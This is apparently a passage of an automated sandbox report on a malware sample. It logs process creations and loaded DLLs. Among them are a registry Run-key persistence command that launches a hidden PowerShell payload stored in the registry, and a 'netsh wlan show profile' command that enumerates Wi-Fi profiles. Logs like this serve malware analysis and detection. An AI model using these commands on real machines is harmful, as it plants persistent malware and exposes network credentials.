            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
            Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr All
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr All
            Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: sti.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: propsys.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: edputil.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: appresolver.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: bcp47langs.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: slc.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: sppc.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: version.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: rasman.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: rtutils.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: secur32.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: schannel.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: mskeyprotect.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: ntasn1.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: ncrypt.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: ncryptsslp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: gpapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: amsi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
            Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
            Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
            Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
            Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: napinsp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: pnrpnsp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: wshbth.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: nlaapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: winrnr.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: sti.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: version.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: rasman.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: rtutils.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: secur32.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: schannel.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: mskeyprotect.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: ntasn1.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: ncrypt.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: ncryptsslp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: gpapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: amsi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\chcp.com Section loaded: ulib.dll
            Source: C:\Windows\SysWOW64\chcp.com Section loaded: fsutilext.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll
